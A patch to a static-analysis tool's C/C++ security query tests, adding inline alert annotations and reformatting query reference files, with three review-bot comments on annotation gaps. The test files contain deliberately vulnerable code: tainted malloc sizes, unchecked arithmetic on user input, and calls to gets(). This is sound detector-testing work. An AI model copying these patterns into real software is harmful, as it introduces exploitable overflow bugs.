@@ -145,11 +145,11 @@ void more_bounded_tests() { } { - long size = atol(getenv("USER")); + long size = atol(getenv("USER")); // $ Source if (size > 0) { - malloc(size * sizeof(int)); // BAD + malloc(size * sizeof(int)); // BAD // $ Alert } } @@ -187,11 +187,11 @@ void more_bounded_tests() { } { - int size = atoi(getenv("USER")); + int size = atoi(getenv("USER")); // $ Source if (size % 100) { - malloc(size * sizeof(int)); // BAD + malloc(size * sizeof(int)); // BAD // $ Alert } } @@ -202,11 +202,11 @@ void more_bounded_tests() { } { - int size = atoi(getenv("USER")); + int size = atoi(getenv("USER")); // $ Source if (size & 7) { - malloc(size * sizeof(int)); // BAD + malloc(size * sizeof(int)); // BAD // $ Alert } } @@ -238,7 +238,7 @@ size_t get_untainted_size() size_t get_tainted_size() { - return atoi(getenv("USER")) * sizeof(int); + return atoi(getenv("USER")) * sizeof(int); // $ Source } size_t get_bounded_size() @@ -258,27 +258,27 @@ void *my_alloc(size_t s) { } void my_func(size_t s) { - void *ptr = malloc(s); // BAD + void *ptr = malloc(s); // BAD // $ Alert free(ptr); } void more_cases() { - int local_size = atoi(getenv("USER")) * sizeof(int); + int local_size = atoi(getenv("USER")) * sizeof(int); // $ Source - malloc(local_size); // BAD + malloc(local_size); // BAD // $ Alert malloc(get_untainted_size()); // GOOD - malloc(get_tainted_size()); // BAD + malloc(get_tainted_size()); // BAD // $ Alert malloc(get_bounded_size()); // GOOD my_alloc(100); // GOOD - my_alloc(local_size); // BAD + my_alloc(local_size); // BAD // $ Alert my_func(100); // GOOD my_func(local_size); // GOOD } bool get_size(int &out_size) { - out_size = atoi(getenv("USER")); + out_size = atoi(getenv("USER")); // $ Source return true; } 
@@ -286,11 +286,11 @@ bool get_size(int &out_size) { void equality_cases() { { int size1 = atoi(getenv("USER")); - int size2 = atoi(getenv("USER")); + int size2 = atoi(getenv("USER")); // $ Source if (size1 == 100) { - malloc(size2 * sizeof(int)); // BAD + malloc(size2 * sizeof(int)); // BAD // $ Alert } if (size2 == 100) { @@ -318,7 +318,7 @@ void equality_cases() { if ((get_size(size)) && (size != 100)) { - malloc(size * sizeof(int)); // BAD + malloc(size * sizeof(int)); // BAD // $ Alert } } { @@ -335,7 +335,7 @@ void equality_cases() { if ((!get_size(size)) || (size == 100)) return; - malloc(size * sizeof(int)); // BAD + malloc(size * sizeof(int)); // BAD // $ Alert } { int size = atoi(getenv("USER")); @@ -380,8 +380,8 @@ void *MyMalloc2(size_t size); void customAllocatorTests() { - int size = atoi(getenv("USER")); + int size = atoi(getenv("USER")); // $ Source - char *chars1 = (char *)MyMalloc1(size); // BAD - char *chars2 = (char *)MyMalloc2(size); // BAD + char *chars1 = (char *)MyMalloc1(size); // BAD // $ Alert + char *chars2 = (char *)MyMalloc2(size); // BAD // $ Alert } diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/tainted/ArithmeticTainted.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/tainted/ArithmeticTainted.expected index 34aa8a7a7e4a..795895891407 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/tainted/ArithmeticTainted.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/tainted/ArithmeticTainted.expected 
@@ -1,3 +1,15 @@ +#select +| test2.cpp:14:11:14:11 | v | test2.cpp:25:22:25:23 | fscanf output argument | test2.cpp:14:11:14:11 | v | $@ flows to an operand of an arithmetic expression, potentially causing an overflow. | test2.cpp:25:22:25:23 | fscanf output argument | value read by fscanf | +| test2.cpp:14:11:14:11 | v | test2.cpp:25:22:25:23 | fscanf output argument | test2.cpp:14:11:14:11 | v | $@ flows to an operand of an arithmetic expression, potentially causing an underflow. | test2.cpp:25:22:25:23 | fscanf output argument | value read by fscanf | +| test2.cpp:39:9:39:11 | num | test2.cpp:36:9:36:14 | fgets output argument | test2.cpp:39:9:39:11 | num | $@ flows to an operand of an arithmetic expression, potentially causing an overflow. | test2.cpp:36:9:36:14 | fgets output argument | string read by fgets | +| test2.cpp:40:3:40:5 | num | test2.cpp:36:9:36:14 | fgets output argument | test2.cpp:40:3:40:5 | num | $@ flows to an operand of an arithmetic expression, potentially causing an overflow. | test2.cpp:36:9:36:14 | fgets output argument | string read by fgets | +| test5.cpp:17:6:17:18 | call to getTaintedInt | test5.cpp:9:7:9:9 | gets output argument | test5.cpp:17:6:17:18 | call to getTaintedInt | $@ flows to an operand of an arithmetic expression, potentially causing an overflow. | test5.cpp:9:7:9:9 | gets output argument | string read by gets | +| test5.cpp:19:6:19:6 | y | test5.cpp:9:7:9:9 | gets output argument | test5.cpp:19:6:19:6 | y | $@ flows to an operand of an arithmetic expression, potentially causing an overflow. | test5.cpp:9:7:9:9 | gets output argument | string read by gets | +| test5.cpp:19:6:19:6 | y | test5.cpp:9:7:9:9 | gets output argument | test5.cpp:19:6:19:6 | y | $@ flows to an operand of an arithmetic expression, potentially causing an underflow. 
| test5.cpp:9:7:9:9 | gets output argument | string read by gets | +| test.c:14:15:14:28 | maxConnections | main.cpp:7:27:7:30 | **argv | test.c:14:15:14:28 | maxConnections | $@ flows to an operand of an arithmetic expression, potentially causing an overflow. | main.cpp:7:27:7:30 | **argv | a command-line argument | +| test.c:14:15:14:28 | maxConnections | main.cpp:7:27:7:30 | **argv | test.c:14:15:14:28 | maxConnections | $@ flows to an operand of an arithmetic expression, potentially causing an underflow. | main.cpp:7:27:7:30 | **argv | a command-line argument | +| test.c:44:7:44:10 | len2 | main.cpp:7:27:7:30 | **argv | test.c:44:7:44:10 | len2 | $@ flows to an operand of an arithmetic expression, potentially causing an underflow. | main.cpp:7:27:7:30 | **argv | a command-line argument | +| test.c:54:7:54:10 | len3 | main.cpp:7:27:7:30 | **argv | test.c:54:7:54:10 | len3 | $@ flows to an operand of an arithmetic expression, potentially causing an underflow. | main.cpp:7:27:7:30 | **argv | a command-line argument | edges | main.cpp:7:27:7:30 | **argv | main.cpp:8:17:8:20 | **argv | provenance | | | main.cpp:8:17:8:20 | **argv | test.c:10:28:10:31 | **argv | provenance | | 
@@ -53,15 +65,3 @@ nodes | test.c:54:7:54:10 | len3 | semmle.label | len3 | | test.c:54:7:54:12 | ... -- | semmle.label | ... -- | subpaths -#select -| test2.cpp:14:11:14:11 | v | test2.cpp:25:22:25:23 | fscanf output argument | test2.cpp:14:11:14:11 | v | $@ flows to an operand of an arithmetic expression, potentially causing an overflow. | test2.cpp:25:22:25:23 | fscanf output argument | value read by fscanf | -| test2.cpp:14:11:14:11 | v | test2.cpp:25:22:25:23 | fscanf output argument | test2.cpp:14:11:14:11 | v | $@ flows to an operand of an arithmetic expression, potentially causing an underflow. | test2.cpp:25:22:25:23 | fscanf output argument | value read by fscanf | -| test2.cpp:39:9:39:11 | num | test2.cpp:36:9:36:14 | fgets output argument | test2.cpp:39:9:39:11 | num | $@ flows to an operand of an arithmetic expression, potentially causing an overflow. | test2.cpp:36:9:36:14 | fgets output argument | string read by fgets | -| test2.cpp:40:3:40:5 | num | test2.cpp:36:9:36:14 | fgets output argument | test2.cpp:40:3:40:5 | num | $@ flows to an operand of an arithmetic expression, potentially causing an overflow. | test2.cpp:36:9:36:14 | fgets output argument | string read by fgets | -| test5.cpp:17:6:17:18 | call to getTaintedInt | test5.cpp:9:7:9:9 | gets output argument | test5.cpp:17:6:17:18 | call to getTaintedInt | $@ flows to an operand of an arithmetic expression, potentially causing an overflow. | test5.cpp:9:7:9:9 | gets output argument | string read by gets | -| test5.cpp:19:6:19:6 | y | test5.cpp:9:7:9:9 | gets output argument | test5.cpp:19:6:19:6 | y | $@ flows to an operand of an arithmetic expression, potentially causing an overflow. | test5.cpp:9:7:9:9 | gets output argument | string read by gets | -| test5.cpp:19:6:19:6 | y | test5.cpp:9:7:9:9 | gets output argument | test5.cpp:19:6:19:6 | y | $@ flows to an operand of an arithmetic expression, potentially causing an underflow. 
| test5.cpp:9:7:9:9 | gets output argument | string read by gets | -| test.c:14:15:14:28 | maxConnections | main.cpp:7:27:7:30 | **argv | test.c:14:15:14:28 | maxConnections | $@ flows to an operand of an arithmetic expression, potentially causing an overflow. | main.cpp:7:27:7:30 | **argv | a command-line argument | -| test.c:14:15:14:28 | maxConnections | main.cpp:7:27:7:30 | **argv | test.c:14:15:14:28 | maxConnections | $@ flows to an operand of an arithmetic expression, potentially causing an underflow. | main.cpp:7:27:7:30 | **argv | a command-line argument | -| test.c:44:7:44:10 | len2 | main.cpp:7:27:7:30 | **argv | test.c:44:7:44:10 | len2 | $@ flows to an operand of an arithmetic expression, potentially causing an underflow. | main.cpp:7:27:7:30 | **argv | a command-line argument | -| test.c:54:7:54:10 | len3 | main.cpp:7:27:7:30 | **argv | test.c:54:7:54:10 | len3 | $@ flows to an operand of an arithmetic expression, potentially causing an underflow. | main.cpp:7:27:7:30 | **argv | a command-line argument | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/tainted/ArithmeticTainted.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/tainted/ArithmeticTainted.qlref index 3939653db1c3..d8fb26f7e023 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/tainted/ArithmeticTainted.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/tainted/ArithmeticTainted.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-190/ArithmeticTainted.ql +query: Security/CWE/CWE-190/ArithmeticTainted.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/tainted/IntegerOverflowTainted.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/tainted/IntegerOverflowTainted.qlref index df42008c632b..419ed80f3b9e 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/tainted/IntegerOverflowTainted.qlref 
+++ b/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/tainted/IntegerOverflowTainted.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-190/IntegerOverflowTainted.ql +query: Security/CWE/CWE-190/IntegerOverflowTainted.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/tainted/main.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/tainted/main.cpp index 645b5893deaa..2a91b61f5fab 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/tainted/main.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/tainted/main.cpp @@ -4,7 +4,7 @@ int main3(int argc, char** argv); } int main4(int argc, char** argv); -int main(int argc, char** argv) { +int main(int argc, char** argv) { // $ Source[cpp/tainted-arithmetic] main1(argc, argv); main3(argc, argv); main4(argc, argv); diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/tainted/test.c b/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/tainted/test.c index b39e54084ac3..cd42710fa1e5 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/tainted/test.c +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/tainted/test.c @@ -11,7 +11,7 @@ int main1(int argc, char** argv) { int maxConnections = atoi(argv[1]); // BAD: arithmetic on a user input without any validation - startServer(maxConnections * 1000); + startServer(maxConnections * 1000); // $ Alert[cpp/integer-overflow-tainted] Alert[cpp/tainted-arithmetic] // GOOD: check the user input first int maxConnections2 = atoi(argv[1]); @@ -41,7 +41,7 @@ int main1(int argc, char** argv) { len2 = atoi(argv[1]); while (len2) { - len2--; // BAD: can underflow, if len2 is initially negative. + len2--; // BAD: can underflow, if len2 is initially negative. // $ Alert[cpp/integer-overflow-tainted] Alert[cpp/tainted-arithmetic] } } 
@@ -51,7 +51,7 @@ int main1(int argc, char** argv) { len3 = atoi(argv[1]); while (len3 != 0) { - len3--; // BAD: can underflow, if len3 is initially negative. + len3--; // BAD: can underflow, if len3 is initially negative. // $ Alert[cpp/integer-overflow-tainted] Alert[cpp/tainted-arithmetic] } } diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/tainted/test2.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/tainted/test2.cpp index 1cf12a197f4d..b656c39a0ca0 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/tainted/test2.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/tainted/test2.cpp @@ -11,10 +11,10 @@ typedef struct _myStruct { void test2_sink(s64 v, MyStruct s, MyStruct &s_r, MyStruct *s_p) { - s64 v1 = v * 2; // bad - s64 v2 = s.val * 2; // bad - s64 v3 = s_r.val * 2; // bad - s64 v4 = s_p->val * 2; // bad + s64 v1 = v * 2; // bad // $ Alert[cpp/integer-overflow-tainted] Alert[cpp/tainted-arithmetic] + s64 v2 = s.val * 2; // bad // $ Alert[cpp/integer-overflow-tainted] + s64 v3 = s_r.val * 2; // bad // $ Alert[cpp/integer-overflow-tainted] + s64 v4 = s_p->val * 2; // bad // $ Alert[cpp/integer-overflow-tainted] } void test2_source() @@ -22,7 +22,7 @@ void test2_source() MyStruct ms; s64 v; - fscanf(stdin, "%i", &v); + fscanf(stdin, "%i", &v); // $ Source[cpp/tainted-arithmetic] ms.val = v; test2_sink(v, ms, ms, &ms); } @@ -33,9 +33,9 @@ int atoi(const char *); void test3() { char buffer[20]; - fgets(buffer, 20, stdin); + fgets(buffer, 20, stdin); // $ Source[cpp/tainted-arithmetic] int num = atoi(buffer); - num = num + 1000; // BAD - num += 1000; // BAD + num = num + 1000; // BAD // $ Alert[cpp/integer-overflow-tainted] Alert[cpp/tainted-arithmetic] + num += 1000; // BAD // $ Alert[cpp/integer-overflow-tainted] Alert[cpp/tainted-arithmetic] } \ No newline at end of file 
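Review bot: In `test2_sink` (test2.cpp, hunk `@@ -11,10`) the `s.val`, `s_r.val` and `s_p->val` lines are all commented `// bad` but expect only `Alert[cpp/integer-overflow-tainted]`, while the `v * 2` line above them also expects `Alert[cpp/tainted-arithmetic]`. The regenerated `ArithmeticTainted.expected` lists only `test2.cpp:14` for this function, so this looks like an existing false negative for values carried in struct fields rather than an intended negative. If that is right, `// $ Alert[cpp/integer-overflow-tainted] MISSING: Alert[cpp/tainted-arithmetic]` on those three lines would record it explicitly instead of leaving it implied by a missing tag.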
diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/tainted/test3.c b/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/tainted/test3.c index a8116e058530..f24b640810de 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/tainted/test3.c +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/tainted/test3.c @@ -9,8 +9,8 @@ // from a macro that is defined in a system header. int main3(int argc, char **argv) { char *cmd = argv[0]; - int x = (int)(unsigned char)*cmd; // BAD: overflow - int y = CAST(*cmd); // BAD: overflow in macro expansion (macro is not from a system header) + int x = (int)(unsigned char)*cmd; // BAD: overflow // $ Alert[cpp/integer-overflow-tainted] + int y = CAST(*cmd); // BAD: overflow in macro expansion (macro is not from a system header) // $ Alert[cpp/integer-overflow-tainted] int z = SYSTEM_CAST(*cmd); // GOOD: overflow in macro expansion (macro from a system header) return x + y + z; } diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/tainted/test4.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/tainted/test4.cpp index ad4cc80d30ac..c298e431e946 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/tainted/test4.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/tainted/test4.cpp @@ -10,7 +10,7 @@ int main4(int argc, char **argv) { if (!p[0]) { // GOOD: cast to bool. return 1; } - if ((unsigned)p[1] == 0) { // BAD: cast to unsigned could overflow. + if ((unsigned)p[1] == 0) { // BAD: cast to unsigned could overflow. // $ Alert[cpp/integer-overflow-tainted] return 2; } if ((bool)p[2] != 0 || !p[3] == 1) { // GOOD: casts to bool. diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/tainted/test5.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/tainted/test5.cpp index 2ee675be6b57..27b4a652e35b 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/tainted/test5.cpp 
+++ b/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/tainted/test5.cpp @@ -6,17 +6,17 @@ int getTaintedInt() { char buf[128]; - gets(buf); - return strtoul(buf, 0, 10); + gets(buf); // $ Source[cpp/tainted-arithmetic] + return strtoul(buf, 0, 10); // $ Alert[cpp/integer-overflow-tainted] } void useTaintedInt() { int x, y; - x = getTaintedInt() * 1024; // BAD: arithmetic on a tainted value + x = getTaintedInt() * 1024; // BAD: arithmetic on a tainted value // $ Alert[cpp/integer-overflow-tainted] Alert[cpp/tainted-arithmetic] y = getTaintedInt(); - y = y * 1024; // BAD: arithmetic on a tainted value + y = y * 1024; // BAD: arithmetic on a tainted value // $ Alert[cpp/integer-overflow-tainted] Alert[cpp/tainted-arithmetic] } typedef long long int intmax_t; diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/tainted/test6.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/tainted/test6.cpp index c7034e6cd0ea..596e5030baed 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/tainted/test6.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/tainted/test6.cpp @@ -8,12 +8,12 @@ FILE *stdin; void docast1(u32 s) { - u16 c = (u16)s; // bad + u16 c = (u16)s; // bad // $ Alert[cpp/integer-overflow-tainted] } void docast2(u32 s) { - u16 c = (u16)s; // bad + u16 c = (u16)s; // bad // $ Alert[cpp/integer-overflow-tainted] } class MyBaseClass @@ -27,7 +27,7 @@ class MyDerivedClass : public MyBaseClass public: void docast(u32 s) { - u16 c = (u16)s; // bad + u16 c = (u16)s; // bad // $ Alert[cpp/integer-overflow-tainted] } }; diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-191/UnsignedDifferenceExpressionComparedZero/UnsignedDifferenceExpressionComparedZero.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-191/UnsignedDifferenceExpressionComparedZero/UnsignedDifferenceExpressionComparedZero.qlref index 9681978c0ad1..ebdee8ed6310 100644 
--- a/cpp/ql/test/query-tests/Security/CWE/CWE-191/UnsignedDifferenceExpressionComparedZero/UnsignedDifferenceExpressionComparedZero.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-191/UnsignedDifferenceExpressionComparedZero/UnsignedDifferenceExpressionComparedZero.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-191/UnsignedDifferenceExpressionComparedZero.ql +query: Security/CWE/CWE-191/UnsignedDifferenceExpressionComparedZero.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-191/UnsignedDifferenceExpressionComparedZero/test.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-191/UnsignedDifferenceExpressionComparedZero/test.cpp index 37930f821291..c143bb62cdea 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-191/UnsignedDifferenceExpressionComparedZero/test.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-191/UnsignedDifferenceExpressionComparedZero/test.cpp @@ -3,11 +3,11 @@ int getAnInt(); bool cond(); void test(unsigned x, unsigned y, bool unknown) { - if(x - y > 0) { } // BAD + if(x - y > 0) { } // BAD // $ Alert unsigned total = getAnInt(); unsigned limit = getAnInt(); - while(limit - total > 0) { // BAD + while(limit - total > 0) { // BAD // $ Alert total += getAnInt(); } @@ -59,7 +59,7 @@ void test(unsigned x, unsigned y, bool unknown) { if(unknown) { ++y; } } - if(x - y > 0) { } // GOOD [FALSE POSITIVE] + if(x - y > 0) { } // GOOD [FALSE POSITIVE] // $ Alert x = y; while(cond()) { @@ -72,7 +72,7 @@ void test(unsigned x, unsigned y, bool unknown) { if (n > x - y) { n = x - y; } if (n > 0) { y += n; // NOTE: `n` is at most `x - y` at this point. - if (x - y > 0) {} // GOOD [FALSE POSITIVE] + if (x - y > 0) {} // GOOD [FALSE POSITIVE] // $ Alert } } @@ -98,7 +98,7 @@ void test4() { unsigned int a = getAnInt(); unsigned int b = a + 1; - if (a - b > 0) { // BAD + if (a - b > 0) { // BAD // $ Alert // ... } } 
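Review bot: The two `x - y > 0` checks commented `// GOOD [FALSE POSITIVE]` in `test` (hunks `@@ -59,7` and `@@ -72,7`) are annotated with a plain `// $ Alert`, which records a known false positive as if it were a wanted result; the same applies to the `// GOOD (as a >= b) [FALSE POSITIVE]` line in `test9` (hunk `@@ -179,7`). Marking them `// $ SPURIOUS: Alert` keeps the test passing today, tells a reader the alert is unwanted, and makes the test flag the annotation once the query stops reporting these lines. test's body starts and ends outside these hunks.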
@@ -125,7 +125,7 @@ void test7() { unsigned int b = getAnInt(); unsigned int a = b - 1; - if (a - b > 0) { // BAD + if (a - b > 0) { // BAD // $ Alert // ... } } @@ -134,7 +134,7 @@ void test8() { unsigned int a = getAnInt(); unsigned int b = getAnInt(); - if (a - b > 0) { // BAD + if (a - b > 0) { // BAD // $ Alert // ... } @@ -143,13 +143,13 @@ void test8() { // ... } } else { - if (a - b > 0) { // BAD + if (a - b > 0) { // BAD // $ Alert // ... } } if (b >= a) { // GOOD - if (a - b > 0) { // BAD + if (a - b > 0) { // BAD // $ Alert // ... } } else { @@ -179,7 +179,7 @@ void test9() { b = 0; } - if (a - b > 0) { // GOOD (as a >= b) [FALSE POSITIVE] + if (a - b > 0) { // GOOD (as a >= b) [FALSE POSITIVE] // $ Alert // ... } } @@ -205,7 +205,7 @@ void test11() { b = getAnInt(); - if (a - b > 0) { // BAD + if (a - b > 0) { // BAD // $ Alert // ... } } @@ -249,7 +249,7 @@ int test14() { return 0; } // b != 0 - return (a - b > 0); // BAD + return (a - b > 0); // BAD // $ Alert } struct Numbers @@ -263,7 +263,7 @@ int test15(Numbers *n) { return 0; } - return (n->a - n->b > 0); // BAD + return (n->a - n->b > 0); // BAD // $ Alert } int test16() { @@ -273,7 +273,7 @@ int test16() { if (!b) { return 0; } else { - return (a - b > 0); // BAD + return (a - b > 0); // BAD // $ Alert } } @@ -285,7 +285,7 @@ int test17() { return 0; } // b != 0 - return (a - b > 0); // BAD + return (a - b > 0); // BAD // $ Alert } int test18() { @@ -309,7 +309,7 @@ void test19() { uint32_t limit = get_limit(); uint32_t total = 0; - while (limit - total > 0) { // BAD: if `total` is greater than `limit` this will underflow and continue executing the loop. + while (limit - total > 0) { // BAD: if `total` is greater than `limit` this will underflow and continue executing the loop. // $ Alert total += get_data(); } @@ -359,7 +359,7 @@ void test21(unsigned long a) if(a - b > 0) { } // GOOD } int64_t b = (int64_t)a + c; - if(a - b > 0) { } // BAD + if(a - b > 0) { } // BAD // $ Alert } { 
diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-193/InvalidPointerDeref.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-193/InvalidPointerDeref.qlref index b899b6eeb205..75e8699aaac2 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-193/InvalidPointerDeref.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-193/InvalidPointerDeref.qlref @@ -1 +1 @@ -Security/CWE/CWE-193/InvalidPointerDeref.ql +query: Security/CWE/CWE-193/InvalidPointerDeref.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-197/SAMATE/IntegerOverflowTainted/IntegerOverflowTainted.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-197/SAMATE/IntegerOverflowTainted/IntegerOverflowTainted.qlref index 72ed7d536854..419ed80f3b9e 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-197/SAMATE/IntegerOverflowTainted/IntegerOverflowTainted.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-197/SAMATE/IntegerOverflowTainted/IntegerOverflowTainted.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-190/IntegerOverflowTainted.ql \ No newline at end of file +query: Security/CWE/CWE-190/IntegerOverflowTainted.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-197/SAMATE/IntegerOverflowTainted/tests.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-197/SAMATE/IntegerOverflowTainted/tests.cpp index 79f9a79c97fc..76d25fbe46c8 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-197/SAMATE/IntegerOverflowTainted/tests.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-197/SAMATE/IntegerOverflowTainted/tests.cpp @@ -35,7 +35,7 @@ void CWE197_Numeric_Truncation_Error__short_fscanf_82_bad::action(short data) { { /* POTENTIAL FLAW: Convert data to a char, possibly causing a truncation error */ - char charData = (char)data; + char charData = (char)data; // $ Alert printHexCharLine(charData); } } 
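Review bot: InvalidPointerDeref.qlref is converted to the `query:` form but, unlike the other .qlref files visible in this patch, gets no `postprocess: utils/test/InlineExpectationsTestQuery.ql` line. Without it, any inline `// $ Alert` annotations for this query would presumably not be checked and the test stays on the .expected file alone. If that is deliberate, a sentence in the commit message would help; otherwise add the `postprocess:` line as a second line here.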
diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-242/semmle/tests/DangerousFunctionOverflow.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-242/semmle/tests/DangerousFunctionOverflow.qlref
index e46499468514..41d5b35b3c97 100644
--- a/cpp/ql/test/query-tests/Security/CWE/CWE-242/semmle/tests/DangerousFunctionOverflow.qlref
+++ b/cpp/ql/test/query-tests/Security/CWE/CWE-242/semmle/tests/DangerousFunctionOverflow.qlref
@@ -1 +1,2 @@
-Security/CWE/CWE-676/DangerousFunctionOverflow.ql
+query: Security/CWE/CWE-676/DangerousFunctionOverflow.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-242/semmle/tests/DangerousUseOfCin.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-242/semmle/tests/DangerousUseOfCin.qlref
index 676e30536454..a5067fc5ee1a 100644
--- a/cpp/ql/test/query-tests/Security/CWE/CWE-242/semmle/tests/DangerousUseOfCin.qlref
+++ b/cpp/ql/test/query-tests/Security/CWE/CWE-242/semmle/tests/DangerousUseOfCin.qlref
@@ -1 +1,2 @@
-Security/CWE/CWE-676/DangerousUseOfCin.ql
\ No newline at end of file
+query: Security/CWE/CWE-676/DangerousUseOfCin.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-242/semmle/tests/OverrunWrite.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-242/semmle/tests/OverrunWrite.qlref
index f6c962c1a7b4..18ae0f2a567b 100644
--- a/cpp/ql/test/query-tests/Security/CWE/CWE-242/semmle/tests/OverrunWrite.qlref
+++ b/cpp/ql/test/query-tests/Security/CWE/CWE-242/semmle/tests/OverrunWrite.qlref
@@ -1 +1,2 @@
-Security/CWE/CWE-120/OverrunWrite.ql
\ No newline at end of file
+query: Security/CWE/CWE-120/OverrunWrite.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-242/semmle/tests/OverrunWriteFloat.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-242/semmle/tests/OverrunWriteFloat.qlref
index 757d1592e830..ba8f6a96a1fd 100644
--- a/cpp/ql/test/query-tests/Security/CWE/CWE-242/semmle/tests/OverrunWriteFloat.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-242/semmle/tests/OverrunWriteFloat.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-120/OverrunWriteFloat.ql \ No newline at end of file +query: Security/CWE/CWE-120/OverrunWriteFloat.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-242/semmle/tests/VeryLikelyOverrunWrite.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-242/semmle/tests/VeryLikelyOverrunWrite.qlref index 94b53951c4b7..8dcc2f70c2f6 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-242/semmle/tests/VeryLikelyOverrunWrite.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-242/semmle/tests/VeryLikelyOverrunWrite.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-120/VeryLikelyOverrunWrite.ql \ No newline at end of file +query: Security/CWE/CWE-120/VeryLikelyOverrunWrite.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-242/semmle/tests/tests.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-242/semmle/tests/tests.cpp index 8bb6dfdd996c..870d6786e000 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-242/semmle/tests/tests.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-242/semmle/tests/tests.cpp @@ -109,7 +109,7 @@ char *test1() { static char buffer[1024]; - return gets(buffer); // BAD: use of gets + return gets(buffer); // BAD: use of gets // $ Alert[cpp/dangerous-function-overflow] } typedef char MYCHAR; 
